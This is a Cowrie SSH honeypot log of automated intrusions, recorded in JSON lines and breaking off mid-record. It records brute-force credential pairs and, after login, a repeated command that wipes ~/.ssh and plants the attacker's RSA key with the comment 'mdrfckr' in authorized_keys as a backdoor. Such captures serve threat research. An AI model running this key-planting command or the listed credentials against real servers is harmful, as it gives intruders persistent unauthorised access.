{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:39:18.539869Z","src_ip":"212.227.235.229","session":"0d0193250857"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:39:18.896140Z","src_ip":"212.227.235.229","session":"0d0193250857"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:39:18.976484Z","src_ip":"212.227.235.229","session":"6536bfc4fad1"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:39:18.977608Z","src_ip":"212.227.235.229","session":"0d0193250857"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":64314,"dst_ip":"1.2.3.4","dst_port":22,"session":"5e98531d0c10","protocol":"ssh","message":"New connection: 212.227.235.229:64314 (1.2.3.4:22) [session: 5e98531d0c10]","sensor":"my-vps","timestamp":"2025-09-09T05:39:53.298050Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:39:53.299110Z","src_ip":"212.227.235.229","session":"5e98531d0c10"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:39:53.443747Z","src_ip":"212.227.235.229","session":"5e98531d0c10"}
{"eventid":"cowrie.session.connect","src_ip":"213.6.203.226","src_port":42610,"dst_ip":"1.2.3.4","dst_port":22,"session":"cf8e2195d61c","protocol":"ssh","message":"New connection: 213.6.203.226:42610 (1.2.3.4:22) [session: cf8e2195d61c]","sensor":"my-vps","timestamp":"2025-09-09T05:39:53.924216Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:39:53.924866Z","src_ip":"213.6.203.226","session":"cf8e2195d61c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:39:53.995307Z","src_ip":"213.6.203.226","session":"cf8e2195d61c"}
{"eventid":"cowrie.login.failed","username":"testuser","password":"abc123","message":"login attempt [testuser/abc123] failed","sensor":"my-vps","timestamp":"2025-09-09T05:39:54.007337Z","src_ip":"212.227.235.229","session":"5e98531d0c10"}
{"eventid":"cowrie.login.success","username":"root","password":"Hetzner12","message":"login attempt [root/Hetzner12] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:39:54.313632Z","src_ip":"213.6.203.226","session":"cf8e2195d61c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:39:54.499694Z","src_ip":"213.6.203.226","session":"cf8e2195d61c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:39:54.500434Z","src_ip":"213.6.203.226","session":"cf8e2195d61c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:39:54.501520Z","src_ip":"213.6.203.226","session":"cf8e2195d61c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:39:54.569955Z","src_ip":"213.6.203.226","session":"cf8e2195d61c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:39:54.760303Z","src_ip":"213.6.203.226","session":"cf8e2195d61c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T05:39:54.760968Z","src_ip":"213.6.203.226","session":"cf8e2195d61c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T05:39:54.829947Z","src_ip":"213.6.203.226","session":"cf8e2195d61c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:39:54.830887Z","src_ip":"213.6.203.226","session":"cf8e2195d61c"}
{"eventid":"cowrie.session.connect","src_ip":"213.6.203.226","src_port":45792,"dst_ip":"1.2.3.4","dst_port":22,"session":"baa4461a3142","protocol":"ssh","message":"New connection: 213.6.203.226:45792 (1.2.3.4:22) [session: baa4461a3142]","sensor":"my-vps","timestamp":"2025-09-09T05:39:54.897481Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:39:54.898187Z","src_ip":"213.6.203.226","session":"baa4461a3142"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:39:54.966764Z","src_ip":"213.6.203.226","session":"baa4461a3142"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:39:55.134308Z","src_ip":"212.227.235.229","session":"5e98531d0c10"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T05:39:55.280839Z","src_ip":"213.6.203.226","session":"baa4461a3142"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:39:56.352150Z","src_ip":"213.6.203.226","session":"baa4461a3142"}
{"eventid":"cowrie.session.connect","src_ip":"213.6.203.226","src_port":38109,"dst_ip":"1.2.3.4","dst_port":22,"session":"31008d9fcdcf","protocol":"ssh","message":"New connection: 213.6.203.226:38109 (1.2.3.4:22) [session: 31008d9fcdcf]","sensor":"my-vps","timestamp":"2025-09-09T05:39:56.417192Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:39:56.418131Z","src_ip":"213.6.203.226","session":"31008d9fcdcf"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:39:56.484845Z","src_ip":"213.6.203.226","session":"31008d9fcdcf"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:39:56.793771Z","src_ip":"213.6.203.226","session":"31008d9fcdcf"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:39:56.862273Z","src_ip":"213.6.203.226","session":"31008d9fcdcf"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:39:56.863168Z","src_ip":"213.6.203.226","session":"cf8e2195d61c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58528,"dst_ip":"1.2.3.4","dst_port":22,"session":"74f9e22aca9b","protocol":"ssh","message":"New connection: 212.227.235.229:58528 (1.2.3.4:22) [session: 74f9e22aca9b]","sensor":"my-vps","timestamp":"2025-09-09T05:40:17.142475Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:40:17.143469Z","src_ip":"212.227.235.229","session":"74f9e22aca9b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:40:17.224314Z","src_ip":"212.227.235.229","session":"74f9e22aca9b"}
{"eventid":"cowrie.login.success","username":"root","password":"3edc$RFV","message":"login attempt [root/3edc$RFV] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:40:17.590441Z","src_ip":"212.227.235.229","session":"74f9e22aca9b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:40:17.772925Z","src_ip":"212.227.235.229","session":"74f9e22aca9b"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:40:17.773599Z","src_ip":"212.227.235.229","session":"74f9e22aca9b"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:40:17.774859Z","src_ip":"212.227.235.229","session":"74f9e22aca9b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56756,"dst_ip":"1.2.3.4","dst_port":22,"session":"3fa08b5bad04","protocol":"ssh","message":"New connection: 212.227.235.229:56756 (1.2.3.4:22) [session: 3fa08b5bad04]","sensor":"my-vps","timestamp":"2025-09-09T05:40:17.820661Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:40:17.857171Z","src_ip":"212.227.235.229","session":"74f9e22aca9b"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:40:17.891437Z","src_ip":"212.227.235.229","session":"3fa08b5bad04"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:40:18.130098Z","src_ip":"212.227.235.229","session":"74f9e22aca9b"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T05:40:18.130822Z","src_ip":"212.227.235.229","session":"74f9e22aca9b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:40:18.132923Z","src_ip":"212.227.235.229","session":"3fa08b5bad04"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T05:40:18.213639Z","src_ip":"212.227.235.229","session":"74f9e22aca9b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:40:18.214530Z","src_ip":"212.227.235.229","session":"74f9e22aca9b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58532,"dst_ip":"1.2.3.4","dst_port":22,"session":"cb44484b5714","protocol":"ssh","message":"New connection: 212.227.235.229:58532 (1.2.3.4:22) [session: cb44484b5714]","sensor":"my-vps","timestamp":"2025-09-09T05:40:18.294142Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:40:18.294990Z","src_ip":"212.227.235.229","session":"cb44484b5714"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gc